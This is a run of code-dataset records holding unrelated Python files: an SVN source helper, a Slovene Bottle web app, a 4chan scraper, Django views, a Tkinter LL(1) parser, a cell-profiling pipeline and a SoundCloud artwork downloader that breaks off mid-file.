os.environ:\r\n oldLanguage = os.environ[\"LANG\"]\r\n else:\r\n oldLanguage = \"\"\r\n os.environ[\"LANG\"] = \"C\"\r\n\r\n # handle multiple urls in targets\r\n # we need to find the main url which is marked with #main\r\n # if not marked use the second last one, which is used currently\r\n sourcedir = None\r\n n = self.repositoryUrlCount()\r\n if n > 1:\r\n for i in range(0, n):\r\n if self.repositoryUrlOptions(i) == 'main':\r\n sourcedir = self.checkoutDir(i)\r\n break\r\n # if not found use the second last one\r\n if sourcedir == None:\r\n sourcedir = self.checkoutDir(n-2)\r\n else:\r\n sourcedir = self.checkoutDir()\r\n\r\n # set up the command\r\n cmd = \"%s/svn info %s\" % ( self.svnInstallDir, sourcedir )\r\n\r\n # open a temporary file - do not use generic tmpfile because this doesn't give a good file object with python\r\n tempFileName = os.path.join( self.checkoutDir().replace('/', '\\\\'), \".emergesvninfo.tmp\" )\r\n with open( tempFileName, \"wb+\" ) as tempfile:\r\n\r\n # run the command\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n utils.system( cmd, stdout=tempfile )\r\n\r\n tempfile.seek(os.SEEK_SET)\r\n # read the temporary file and find the line with the revision\r\n for line in tempfile:\r\n if line.startswith(\"Revision: \"):\r\n revision = line.replace(\"Revision: \", \"\").strip()\r\n break\r\n\r\n os.environ[\"LANG\"] = oldLanguage\r\n os.remove( tempFileName )\r\n return revision\r\n\r\n def __splitPath(self, path):\r\n \"\"\" split a path into a base part and a relative repository url.\r\n The delimiters are currently 'trunk', 'branches' and 'tags'.\r\n \"\"\"\r\n pos = path.find('trunk')\r\n if pos == -1:\r\n pos = path.find('branches')\r\n if pos == -1:\r\n pos = path.find('tags')\r\n if pos == -1:\r\n ret = [path, None]\r\n else:\r\n ret = [path[:pos-1], path[pos:]]\r\n return ret\r\n\r\n def __tryCheckoutFromRoot ( self, url, sourcedir, recursive=True ):\r\n \"\"\"This method checkout source with svn informations from\r\n the svn root repository directory. It detects the svn root\r\n by searching the predefined root subdirectories 'trunk', 'branches'\r\n and 'tags' which will probably fit for most servers\r\n \"\"\"\r\n (urlBase, urlPath) = self.__splitPath(url)\r\n if urlPath == None:\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n (srcBase, srcPath) = self.__splitPath(sourcedir)\r\n if srcPath == None:\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n urlRepo = urlBase\r\n srcDir = srcBase\r\n urlParts = urlPath.split('/')\r\n pathSep = '/'\r\n srcParts = srcPath.split(pathSep)\r\n\r\n # url and source parts not match\r\n if len(urlParts) != len(srcParts):\r\n return self.__checkout(url, sourcedir, recursive)\r\n\r\n for i in range(0, len(urlParts)-1):\r\n urlPart = urlParts[i]\r\n srcPart = srcParts[i]\r\n if ( urlPart == \"\" ):\r\n continue\r\n\r\n urlRepo += '/' + urlPart\r\n srcDir += pathSep + srcPart\r\n\r\n if os.path.exists(srcDir):\r\n continue\r\n self.__checkout( urlRepo, srcDir, False )\r\n\r\n self.__checkout( url, sourcedir, recursive )\r\n\r\n def __checkout( self, url, sourcedir, recursive=True ):\r\n \"\"\"internal method for subversion checkout and update\"\"\"\r\n option = \"\"\r\n if not recursive:\r\n option = \"--depth=files\"\r\n\r\n if utils.verbose() < 2 and not utils.envAsBool(\"KDESVNVERBOSE\"):\r\n option += \" --quiet\"\r\n\r\n self.setProxy()\r\n\r\n if self.options != None:\r\n option += self.options\r\n\r\n if self.subinfo.options.fetch.ignoreExternals:\r\n option += \" --ignore-externals \"\r\n\r\n url = utils.replaceVCSUrl( url )\r\n\r\n if os.path.exists( sourcedir ):\r\n cmd = \"%s/svn update %s %s\" % ( self.svnInstallDir, option, sourcedir )\r\n else:\r\n cmd = \"%s/svn checkout %s %s %s\" % (self.svnInstallDir, option, url, sourcedir )\r\n\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n return utils.system( cmd )\r\n\r\n def createPatch( self ):\r\n \"\"\"create patch file from svn source into the related package dir. The patch file is named autocreated.patch\"\"\"\r\n cmd = \"%s/svn diff %s > %s\" % ( self.svnInstallDir, self.checkoutDir(), os.path.join( self.packageDir(), \"%s-%s.patch\" % \\\r\n ( self.package, str( datetime.date.today() ).replace('-', '') ) ) )\r\n with utils.LockFile(utils.LockFileName(\"SVN\")):\r\n return utils.system( cmd )\r\n\r\n def sourceVersion( self ):\r\n \"\"\" print the revision returned by svn info \"\"\"\r\n return True\r\n\r\n def getUrls( self ):\r\n \"\"\"print the url where to check out from\"\"\"\r\n for i in range(self.repositoryUrlCount()):\r\n url = self.repositoryUrl(i)\r\n if self.repositoryUrlOptions(i) == 'norecursive': url = '--depth=files ' + url\r\n print(url)\r\n return True\r\n\r\n def currentRevision(self):\r\n \"\"\"return the name or number of the current revision\"\"\"\r\n return self.__getCurrentRevision()\r\n","sub_path":"Source/SvnSource.py","file_name":"SvnSource.py","file_ext":"py","file_size_in_byte":9497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"253101946","text":"import bottle\nimport os\nimport model\nfrom model import Sopek\nimport json\n\n\n@bottle.get(\"/\")\ndef osnovna_stran():\n stanje = izbira()\n return bottle.template(\n \"osnovna_stran.html\",\n namen=stanje.namen(),\n tip=stanje.tip(),\n barva=stanje.barva(),\n roze=stanje.roze(),\n uporabnisko_ime=bottle.request.get_cookie(\"uporabnisko_ime\"),\n )\n\n\n@bottle.get(\"/prijava/\")\ndef prijava_get():\n return bottle.template(\"prijava.html\", napake={}, polja={}, uporabnisko_ime=None)\n\n\n@bottle.post(\"/prijava/\")\ndef prijava_post():\n uporabnisko_ime = bottle.request.forms.getunicode(\"uporabnisko_ime\")\n bottle.response.set_cookie(\"uporabnisko_ime\", uporabnisko_ime, path=\"/\")\n bottle.redirect(\"/\")\n\n\n@bottle.post(\"/odjava/\")\ndef odjava_post():\n bottle.response.delete_cookie(\"uporabnisko_ime\", path=\"/\")\n print(\"piškotek uspešno pobrisan\")\n bottle.redirect(\"/\")\n\n\n@bottle.post(\"/izberi/\")\ndef izberi_svoj_sanjski_aranžma():\n namen = bottle.request.forms.getunicode(\"namen\")\n tip = bottle.request.forms.getunicode(\"tip\")\n barva = bottle.request.forms.getunicode(\"barva\")\n roza = bottle.request.forms.getunicode(\"roza\") \n print(namen)\n izbira = Sopek(namen, tip, barva,roza)\n stanje = izbira()\n stanje.dodaj_izbiro(izbira)\n shrani_izbiro(izbira)\n bottle.redirect(\"/\")\n\n\n\n\n@bottle.post(\"/pokazi izbrano/\")\ndef pokazi_izbrano():\n indeks = bottle.request.forms.getunicode(\"indeks\")\n stanje = izberi_svoj_sanjski_aranžma()\n bottle.redirect(\"/https://drive.google.com/drive/folders/17m8-n03kBdhueTJ6-yuDrOv9hwd1rw47?usp=sharing\")\n\n\n\n\n@bottle.error(404)\ndef error_404(error):\n return \"Ta stran ne obstaja!\"\n\n\nbottle.run(reloader=True, debug=True)","sub_path":"staro/spletni_vmesnik.py","file_name":"spletni_vmesnik.py","file_ext":"py","file_size_in_byte":1735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"103219640","text":"import time\nfrom random import shuffle, sample\nfrom re import search, findall\nfrom data import Post\nfrom utils.chandata import ChanBoards\nfrom utils.operations import getThreadIdsFromCatalog, getThread, getCommentsFromThreadAsList, removeHTMLFromComment\nimport db\n\nboards = ['pol',\n 'vg',\n 'v',\n 'b',\n 'biz',\n 'int',\n 'a',\n 'tv',\n 'vt',\n 'trash',\n 'mu',\n 'fit',\n 'r9k',\n 'g',\n 'x',\n 'his',\n 'adv',\n 'lit',\n 'bant',\n 'ck',\n 'qa',\n 'aco',\n 'mlp',\n 'vrpg',\n 'soc',\n 'vr',\n 's4s'\n]\n\nshuffle(boards)\n\ndef scrapeBoard(board: str) -> None:\n\n threadsIdList = getThreadIdsFromCatalog(board)\n if not threadsIdList: exit()\n \n print(f\"Beginning {board}, total threads {len(threadsIdList)}\")\n\n for threadIndex, threadId in enumerate(threadsIdList):\n \n delta = 0\n timePast = time.time() \n\n thread = getThread(board, threadId)\n \n if thread: \n for comment in getCommentsFromThreadAsList(thread):\n db.addPost(board,Post(comment))\n \n delta = time.time() - timePast\n print(board, threadIndex, \"/\", len(threadsIdList), delta)\n \n db.con.commit()\n\n\nfor board in boards:\n scrapeBoard(board)\ndb.con.close()\n\n\n","sub_path":"linkfarmer.py","file_name":"linkfarmer.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"272248873","text":"from django.shortcuts import render, HttpResponse\nfrom blog.models import Person\nfrom django.template import Context, Template\nfrom blog.models import Jike\nfrom django.core.paginator import Paginator\n# Create your views here.\n\n\ndef hello(request):\n return HttpResponse(\"Hello world\")\n\n\ndef index(request):\n return render(request, \"index.html\" )\n\n\ndef first_try(request):\n person = Person(name=\"xiewei\", job=\"student\")\n html = '''\n \n \n \n \n \n

    \n \n hello ,{{person.name}}\n

    \n

    \n my job is , {{person.job}}\n

    \n \n \n '''\n t = Template(html)\n c = Context({\"person\": person})\n web_page = t.render(c)\n return HttpResponse(web_page)\n\n\ndef index2(request):\n limit = 4\n daomu = Jike.objects[:20]\n p = Paginator(daomu, limit)\n page = request.GET.get(\"page\", 1)\n page_content = p.page(page)\n context = {\n \"passage\": page_content\n }\n return render(request, \"one.html\", context=context)\n\n\ndef index3(request):\n limit = 5\n daomu = Jike.objects[:20]\n p = Paginator(daomu, limit)\n page = request.GET.get(\"page\", 1)\n page_content = p.page(page)\n context = {\n \"passage\": page_content\n }\n return render(request, \"four.html\", context=context)\n","sub_path":"Learn_Django/pure_blog/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"485717954","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\nimport sys\nfrom Tkinter import *\nfrom tkFont import *\nfrom FileDialog import *\nfrom ScrolledText import ScrolledText\nfrom lexer import lexer_analysis\n\ngrammar = {}\nterminal = []\nnonterminal = []\nfirst = {}\nfollow = {}\nparsing_table = {}\ntoken = []\ntoken_attr = []\nleaf_tab = {}\n\ndef fileloader():\n\tglobal root\n\tcode.delete(1.0, END)\n\tfd = LoadFileDialog(root)\n\tfilename = fd.go()\n\tfin = open(filename, \"r\")\n\tinput_file = fin.read()\n\tfin.close()\n\tcode.insert(1.0, input_file)\n\ndef grammar_scanner():\n\tgrammarIn = open('grammar.ds', 'r')\n\tgrammar_lines = grammarIn.readlines()\n\tgrammarIn.close()\n\n\tfor line in grammar_lines:\n\t\tline_terminal = []\n\t\tline_nonterminal = []\n\t\tgrammar_sequence = []\n\t\ttemp = \"\"\n\n\t\tline = line.strip()\n\t\ttags = line.split(\"\\t->\\t\")\n\t\tif tags[0] is not None:\n\t\t\ttags[0] = tags[0][1:len(tags[0])-1]\n\t\t\tline_nonterminal.append(tags[0])\n\t\t\tgrammar_sequence.append(tags[0])\n\t\ti = 0\n\t\twhile i < len(tags[1]):\n\t\t\tif tags[1][i] == '<':\n\t\t\t\ti += 1\n\t\t\t\twhile tags[1][i] != '>':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti = i +1\n\t\t\t\tline_nonterminal.append(temp)\n\t\t\t\tgrammar_sequence.append(temp)\n\t\t\t\ttemp = \"\"\n\t\t\telif tags[1][i] == '[':\n\t\t\t\ti = i + 1\n\t\t\t\twhile tags[1][i] != ']':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti += 1\n\t\t\t\t\n\t\t\t\tif i != len(tags[1]) - 1 and tags[1][i+1] == ']':\n\t\t\t\t\ttemp += tags[1][i]\n\t\t\t\t\ti += 1\n\t\t\t\tline_terminal.append(temp)\n\t\t\t\tgrammar_sequence.append(temp)\n\t\t\t\ttemp = \"\"\n\t\t\ti += 1\n\t\tif grammar_sequence[0] not in grammar:\n\t\t\tgrammar[grammar_sequence[0]] = []\n\t\tgrammar[grammar_sequence[0]].append(grammar_sequence[1:len(grammar_sequence)])\n\t\tfor each in line_nonterminal:\n\t\t\tif each not in nonterminal:\n\t\t\t\tnonterminal.append(each)\n\t\t\t\tleaf_tab[each] = 0\n\t\tfor each in line_terminal:\n\t\t\tif each not in terminal:\n\t\t\t\tterminal.append(each)\n\tterminal.append('$')\n\ndef getFirst():\n\tglobal grammar\n\tglobal terminal\n\tglobal nonterminal\n\tglobal first\n\n\tfor ter in terminal:\n\t\tfirst[ter] = [ter]\n\tfor nonter in nonterminal:\n\t\tfirst[nonter] = []\n\t\tfor sequence in grammar[nonter]:\n\t\t\tif sequence == ['null']:\n\t\t\t\tfirst[nonter] = ['null']\n\n\tstopFlag = False\n\twhile(not stopFlag):\n\t\tstopFlag = True\n\t\tfor nonter in nonterminal:\n\t\t\tfor sequence in grammar.get(nonter, []):\n\t\t\t\tcounter = 0\n\t\t\t\tfor tag in sequence:\n\t\t\t\t\tfor tagFirst in first[tag]:\n\t\t\t\t\t\tif tagFirst != 'null' and tagFirst not in first[nonter]:\n\t\t\t\t\t\t\tfirst[nonter].append(tagFirst)\n\t\t\t\t\t\t\tstopFlag = False\n\t\t\t\t\tif 'null' not in first[tag]:\n\t\t\t\t\t\tbreak\n\t\t\t\t\telse:\n\t\t\t\t\t\tcounter += 1\n\t\t\t\tif counter == len(sequence) and 'null' not in first[nonter]:\n\t\t\t\t\tfirst[nonter].append('null')\n\t\t\t\t\tstopFlag = False\n\n\t#print first\n\ndef getFollow():\n\tglobal grammar\n\tglobal terminal\n\tglobal nonterminal\n\tglobal first\n\tglobal follow\n\n\tfollow['program'] = ['$']\n\tfor ter in terminal:\n\t\tfollow[ter] = []\n\tfor nonter in nonterminal:\n\t\tfollow[nonter] = []\n\n\tfor nonter in nonterminal:\n\t\tfor sequence in grammar[nonter]:\n\t\t\tfor i in xrange(0,len(sequence)-1):\n\t\t\t\tfor next_first in first[sequence[i+1]]:\n\t\t\t\t\tif next_first != 'null' and next_first not in follow[sequence[i]]:\n\t\t\t\t\t\tfollow[sequence[i]].append(next_first)\n\n\tstopFlag = False\n\twhile(not stopFlag):\n\t\tstopFlag = True\n\t\tfor nonter in nonterminal:\n\t\t\tfor sequence in grammar[nonter]:\n\t\t\t\tfor i in xrange(0,len(sequence)-1):\n\t\t\t\t\tfor each_follow in follow[nonter]:\n\t\t\t\t\t\tif each_follow not in follow[sequence[i]]:\n\t\t\t\t\t\t\tfollow[sequence[i]].append(each_follow)\n\t\t\t\t\t\t\tstopFlag = False\n\t\t\t\t\tif 'null' not in first[sequence[i]]:\n\t\t\t\t\t\tbreak\n\n\t#print follow\n\ndef get_parsing_table():\n\tglobal first\n\tglobal follow\n\tglobal parsing_table\n\tfor nonter in nonterminal:\n\t\tparsing_table[nonter] = {}\n\t\tfor ter in terminal:\n\t\t\tparsing_table[nonter][ter] = -2\n\t\n\tfor nonter in nonterminal:\n\t\tfor i in xrange(0,len(grammar[nonter])):\n\t\t\tcounter = 0\n\t\t\tfor tag in grammar[nonter][i]:\n\t\t\t\tfor each_first in first[tag]:\n\t\t\t\t\tif parsing_table[nonter][each_first] < 0:\n\t\t\t\t\t\tparsing_table[nonter][each_first] = i\n\t\t\t\tif 'null' not in first[tag]:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tcount += 1\n\t\t\tif counter == len(grammar[nonter][i]):\n\t\t\t\tfor each_follow in follow[nonter]:\n\t\t\t\t\tif each_follow in terminal:\n\t\t\t\t\t\tif parsing_table[nonter][each_follow] < 0:\n\t\t\t\t\t\t\tparsing_table[nonter][each_follow] = i\n\t# 同步集合位为-1\n\tfor nonter in nonterminal:\n\t\tfor each_follow in follow[nonter]:\n\t\t\tif parsing_table[nonter][each_follow] < 0:\n\t\t\t\tparsing_table[nonter][each_follow] = -1\n\t#print parsing_table\n\nsyntax_result = []\n\ndef syntax_analysis():\n\tglobal parsing_table\n\tglobal syntax_result\n\tglobal token\n\tglobal token_attr\n\tglobal code\n\tstack = range(1000)\n\tstack[0] = 'program'\n\ttab = range(1000)\n\ttab[0] = 0\n\tleaf_tab['program'] = 0\n\tstack_top = 0\n\ttoken_pointer = 0\n\n\tanalysis.delete(1.0, END)\n\tsyntax_result = []\n\ttoken = []\n\ttoken_attr = []\n\n\tinput_raw = code.get(1.0, END)\n\tinput_str = input_raw.split(\"\\n\")\n\tinput_lines = lexer_analysis(input_str)\n\tfor lines in input_lines:\n\t\ttags = lines.split('\\t')\n\t\twhile tags.count('') > 0:\n\t\t\ttags.remove('')\n\t\tif(len(tags) != 0):\n\t\t\tif(tags[0] == 'SEP' or tags[0] == 'OP'):\n\t\t\t\ttoken.append(tags[1])\n\t\t\telse:\n\t\t\t\ttoken.append(tags[0])\n\t\t\ttoken_attr.append(tags[1])\n\n\twhile(stack_top >= 0):\n\t\tif(token_pointer >= len(token)):\n\t\t\tsyntax_result.append('error:程序结构不完整,编译失败')\n\t\t\tbreak\n\t\tif(stack[stack_top] in terminal):\n\n\t\t\tif stack[stack_top] == token[token_pointer]:\n\t\t\t\tif token[token_pointer] not in (\"IDN\", \"INUM\", \"FNUM\"):\n\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'leaf:[' + token[token_pointer] + ']')\n\t\t\t\telse:\n\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'leaf:[' + token[token_pointer] + \":\" + token_attr[token_pointer] + ']')\n\n\t\t\t\t#print 'leaf:[' + token[token_pointer] + ']'\n\t\t\telse:\n\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error:不可接受的终结符:[' + token[token_pointer] + ']')\t\t\n\t\t\tstack_top -= 1\n\t\t\ttoken_pointer += 1\n\t\telse:\n\t\t\tif parsing_table[stack[stack_top]][token[token_pointer]] < 0:\n\t\t\t\tif ['Lambda'] in grammar[stack[stack_top]]:\n\t\t\t\t\t#syntax_result.append('success: [' + stack[stack_top] + ']\\t->\\t[Lambda]')\n\t\t\t\t\tstack_top -= 1\n\t\t\t\telse:\n\t\t\t\t\tif parsing_table[stack[stack_top]][token[token_pointer]] == -1:\n\t\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error: [' + token[token_pointer] + ']不可接受,进入同步恢复状态,栈顶元素为:'+stack[stack_top])\n\t\t\t\t\t\tstack_top -= 1\n\t\t\t\t\telse:\n\t\t\t\t\t\tsyntax_result.append(' ' * tab[stack_top] + 'error: [' + token[token_pointer] + ']不可接受,忽略该符号以恢复错误')\n\t\t\t\t\t\ttoken_pointer += 1\n\t\t\telse:\n\t\t\t\ttmp_sequence = grammar[stack[stack_top]][parsing_table[stack[stack_top]][token[token_pointer]]]\n\t\t\t\t\n\t\t\t\ttmp_str = ' ' * tab[stack_top] + 'success: [' + stack[stack_top] + ']\\t->\\t'\n\t\t\t\ttab_temp = tab[stack_top]\n\t\t\t\tstack_top -= 1\n\t\t\t\tfor x in xrange(0,len(tmp_sequence)):\n\t\t\t\t\ttmp_str = tmp_str + '[' + tmp_sequence[x] +']'\n\t\t\t\t\tstack_top += 1\n\t\t\t\t\tstack[stack_top] = tmp_sequence[len(tmp_sequence) - 1 - x]\n\t\t\t\t\ttab[stack_top] = tab_temp + 1\n\t\t\t\tsyntax_result.append(tmp_str)\n\t\t\t\t\t\n\t\tif token_pointer == len(token):\n\t\t\tbreak\t\n\tfor each in syntax_result:\n\t\tanalysis.insert(END,each + '\\n')\n\n\nroot = Tk()\ncode = ScrolledText(root, width=50, height=30, font=15)\nanalysis = ScrolledText(root, width=200, height=30, font=10)\n\ndef interface():\n\tglobal root\n\tglobal code\n\tglobal analysis\n\tt = StringVar()\n\tt.set('Syntax by LiTianbao')\n\tlabel = Label(root, textvariable = t, font=15)\n\tAnalysis = Button(root, text = 'Syntax Analysis', command = syntax_analysis, font=15)\n\tload = Button(root, text = ' Load code ', command = fileloader, font=15)\n\troot.title(\"Syntax\")\n\t#root.geometry('1500x800')\n\tlabel.pack(side = TOP)\n\tAnalysis.pack(side = BOTTOM)\n\tload.pack(side = BOTTOM)\n\tcode.pack(side = LEFT)\n\tanalysis.pack(side = RIGHT)\n\troot.mainloop()\n\ndef main():\n\tglobal token\n\t#read token from lexer\n\tgrammar_scanner()\n\tgetFirst()\n\tgetFollow()\n\tget_parsing_table()\n\tinterface()\n\t#syntax_analysis()\n\t\nif __name__ == '__main__':\n\tmain()","sub_path":"syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":7979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"463456136","text":"\"\"\"\nPerform the profiling pipeline (defined in profile.py) given all plates.\n\"\"\"\n\n# Copied from https://github.com/broadinstitute/lincs-cell-painting/blob/master/profiles/profiling_pipeline.py\n\nimport os\nimport pathlib\nimport subprocess\nimport pandas as pd\nfrom profile_utils import get_pipeline_args, find_incomplete_plates\n\n# Load Command Line Arguments\nargs = get_pipeline_args()\noverwrite = args.overwrite # The default is False\n\n# Load constants\nproject = \"2019_07_11_JUMP-CP\"\nbatches = [\n \"2020_06_25_Stain2_Batch2_Binned\",\n \"2020_06_25_Stain2_Batch2_Confocal\",\n \"2020_06_25_Stain2_Batch2_MitoCompare\",\n \"2020_06_25_Stain2_Batch2_Multiplane\",\n \"2020_06_25_Stain2_Batch2_Redone\",\n \"2020_06_25_Stain2_Batch2_Repeat\",\n \"2020_06_25_Stain2_Batch2_Standard\",\n \"2020_08_11_Stain3_Bin1\",\n\t\"2020_08_11_Stain3_HighExp\",\n\t\"2020_08_11_Stain3_Multiplane\",\n\t\"2020_08_11_Stain3_Standard\",\n\t\"2020_08_11_Stain3_Yokogawa\",\n\t\"2020_09_22_Stain4_Bin1\",\n\t\"2020_09_22_Stain4_Bray\",\n\t\"2020_09_22_Stain4_Bray_HighExp\",\n\t\"2020_09_22_Stain4_HighExp\",\n\t\"2020_09_22_Stain4_Standard\",\n\t\"2020_10_02_RestainedCell1\"\n]\n\nfor batch in batches:\n single_cell_dir = pathlib.PurePath(f\"../../single_cell/\")\n profile_dir = pathlib.PurePath(f\"../../profiles/{batch}\")\n barcode_platemap_dir = pathlib.PurePath(f\"../../metadata/platemaps/{batch}\")\n output_base_dir = pathlib.PurePath(f\"../../profiles/{batch}\")\n completed_file_match = \"normalized_feature_select.csv.gz\"\n\n # Load barcode platemap information\n barcode_platemap_file = pathlib.PurePath(\n barcode_platemap_dir, \"barcode_platemap.csv\"\n )\n barcode_platemap_df = pd.read_csv(barcode_platemap_file)\n\n # Load platemap information\n platemap_dir = pathlib.PurePath(barcode_platemap_dir, \"platemap\")\n\n # Load plate information\n plate_dir = pathlib.PurePath(single_cell_dir, batch)\n # plates = [x for x in os.listdir(plate_dir) if x.startswith(\"BR\")]\n plates = [x for x in os.listdir(plate_dir)]\n\n if not overwrite:\n # Only process plates that are not already completely processed\n plates = find_incomplete_plates(\n plates=plates, output_dir=output_base_dir, file_match=completed_file_match\n )\n\n # Load and check MOA information\n moa_file = pathlib.PurePath(\n \"../../metadata/moa/repurposing_info_external_moa_map_resolved.tsv\"\n )\n moa_df = pd.read_csv(moa_file, sep=\"\\t\")\n assert isinstance(\n moa_df, pd.DataFrame\n ), \"Error, MOA file does not exist. Is the path updated?\"\n\n # Process every plate\n for plate in plates:\n print(f\"Now processing... Plate: {plate}\")\n output_dir = pathlib.Path(output_base_dir, plate)\n output_dir.mkdir(parents=True, exist_ok=True)\n cell_count_dir = pathlib.Path(\"../../cell_count\", batch, plate)\n cell_count_dir.mkdir(parents=True, exist_ok=True)\n\n platemap_id = barcode_platemap_df.query(\n \"Assay_Plate_Barcode == @plate\"\n ).Plate_Map_Name.values[0]\n\n platemap_file = pathlib.PurePath(platemap_dir, f\"{platemap_id}.txt\")\n sql_base = pathlib.PurePath(single_cell_dir, batch, plate, f\"{plate}.sqlite\")\n sql_file = f\"sqlite:////{sql_base}\"\n\n cmd = [\n \"python\",\n \"profile.py\",\n \"--sql_file\",\n sql_file,\n \"--batch\",\n batch,\n \"--plate_name\",\n plate,\n \"--platemap_file\",\n platemap_file,\n \"--barcode_platemap_file\",\n barcode_platemap_file,\n \"--moa_file\",\n moa_file,\n \"--output_dir\",\n output_dir,\n \"--cell_count_dir\",\n cell_count_dir,\n ]\n\n subprocess.call(cmd)\n","sub_path":"profiles/profiling_pipeline.py","file_name":"profiling_pipeline.py","file_ext":"py","file_size_in_byte":3751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"405446295","text":"from os import walk\nimport os\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom bs4 import BeautifulSoup as bs\nfrom tqdm import tqdm\nimport requests\nimport urllib.request\nimport time\nimport re\n\n\ndebug = False\n\n# # # # # DEFINITIONS # # # # #\n\n# Objective: Extract mp3 filenames within a specified folder path and append them to a list.\n# Parameters: 'path' - (String) target folder path\n# Return: formatted list of songs (%author% - %title%) without file extension and replacing '&' symbol with '%26'\n# NOTE: Presence of the '&' symbol in filename prevents correct SoundCloud search queries, use '%26' as it holds the\n# same value in the SoundCloud system. This will have to be reversed later when adding cover art metadata.\ndef get_mp3_filenames(path):\n # extracts filenames from folder with extensions\n global total_songs\n info_list = []\n for dirpath, dirnames, filenames in walk(path):\n info_list = filenames\n # removes filename extensions from each song and replaces '&' with '%26'\n for song_info in info_list:\n song_list.append(os.path.splitext(song_info.replace('&', '%26'))[0])\n total_songs += 1\n return song_list\n\n\n# Objective: Generate SoundCloud search strings given a list of songs.\n# Parameters: 'songs' - (String List) list of songs ==> result of 'get_mp3_filenames()'\n# Return: list of SoundCloud search query urls for each song\ndef create_query_urls(songs):\n global total_query_urls\n query_urls = []\n for song in songs:\n \"%20\".join(song.split(\" \")) # replace every space in 'song' with '%20'\n query_urls.append(\"https://soundcloud.com/search?q=\" + song)\n total_query_urls += 1\n return query_urls\n\n\n# Objective: Scrape SoundCloud search query urls for urls of first song result.\n# Parameters: 'query_urls' - (String List) list of SoundCloud search query urls ==> result of 'create_query_urls()'\n# Return: list of SoundCloud song urls\ndef get_first_result(query_urls):\n global total_song_urls\n scrape_progress = tqdm(total=len(query_urls), position=0, leave=True)\n song_urls = []\n\n for url in query_urls:\n scrape_progress.set_description(\"Scraping SoundCloud for song urls...\")\n local_url_list = []\n response = requests.get(url)\n soup = bs(response.content, \"html.parser\")\n time.sleep(0.1)\n\n for local_url in soup.findAll('a', attrs={'href': re.compile(\"^/\")}):\n local_url_list.append(local_url.get('href'))\n song_urls.append(\"https://soundcloud.com\" + local_url_list[5])\n\n # debug: prints all local urls in SoundCloud page source\n if debug:\n print(local_url_list)\n\n total_song_urls += 1\n scrape_progress.update()\n scrape_progress.close()\n return song_urls\n\n\n# Objective: Scrape SoundCloud song urls for artwork covers.\n# Parameters: 'song_urls' - (String List) list of SoundCloud song urls ==> result of 'get_first_result()'\n# Return: list of artwork urls\ndef get_artwork_urls(song_urls):\n download_progress = tqdm(total=len(song_urls), position=0, leave=True)\n global total_artwork_urls\n artwork_urls = []\n\n for song_num, url in enumerate(song_urls):\n download_progress.set_description(\"Scraping SoundCloud for artwork urls...\")\n try:\n soup = bs(requests.get(url).content, 'html.parser')\n time.sleep(0.5)\n target_url = soup.find('img')['src']\n if target_url == '':\n print('\\nSorry. There was an error getting the image url for song (' + str(song_num + 1) + ').')\n print('Possible reason: Target song exists but with no attached artwork cover.')\n print('Associated song name: ' + song_list[song_num])\n print('Associated url: ' + url + '\\n')\n artwork_urls.append('Error occurred.')\n download_progress.update()\n continue\n artwork_urls.append(target_url.replace('t500x500','t3000x3000'))\n total_artwork_urls += 1\n download_progress.update()\n except Exception:\n print('\\nSorry. There was an error getting the image url for song ('+str(song_num+1)+').')\n print('Possible reason: Target song does not exist with given url.')\n print('Associated song name: ' + song_list[song_num])\n print('Associated url: '+url+'\\n')\n artwork_urls.append('Error occurred.')\n download_progress.update()\n download_progress.close()\n return artwork_urls\n\n\n# Objective: Download artwork covers to folder destination.\n# Parameters: 'artwork_urls' - (String List) list of artwork urls ==> result of 'get_artwork_urls'\n# 'download_path' - (String) download destination\n# 'song_filenames' - (String List) list of song filenames ==> result of 'get_mp3_filenames()'\n# Return: None\ndef download_artwork(artwork_urls, download_path, song_filenames):\n download_progress = tqdm(total=len(artwork_urls), position=0, leave=True)\n global total_downloaded_artwork\n\n for song_num, url in enumerate(artwork_urls):\n download_progress.set_description(\"Downloading artwork...\")\n if url == 'Error occurred.':\n download_progress.update()\n continue\n full_path = download_path + '\\\\' + song_filenames[song_num] + '.jpg'\n urllib.request.urlretrieve(url, full_path)\n total_downloaded_artwork += 1\n download_progress.update()\n time.sleep(0.5)\n download_progress.close()\n\n\n# Objective: Print elements of list (newlines) to console\n# Parameters: '_list' - (String List) list of Strings\n# Return: None\ndef print_results(_list):\n print(\"Results: \")\n for element_index in range(len(_list)):\n print(\"(\" + str(element_index + 1) + \")\" + _list[element_index])\n\n\n# Objective: Replace all instances of '%26' in mp3 filenames with '&'\n# Parameters: 'song_filenames' - (String List) list of song filenames ==> result of 'get_mp3_filenames()'\n# Return: None\ndef replace_with_ampersand(song_filenames):\n for num, song in enumerate(song_filenames):\n song_filenames[num] = song.replace('%26', '&')\n return song_filenames\n\n# # # # # EXECUTION # # # # #\n\nprint(\"\\n*BEWARE* This program may not correctly download artwork for songs \\nthat contain non-alphanumerical characters (I'm looking at you, weebs!)\\n\")\nprint(\"\"\"\n-HOW TO USE-\n(1) Locate the folder containing your mp3 files.\n(2) Paste the folder path below.\n(3) Locate/create a folder for downloading artwork.\n(4) Paste download folder path when prompted to.\n*Please Note* Should this program exit 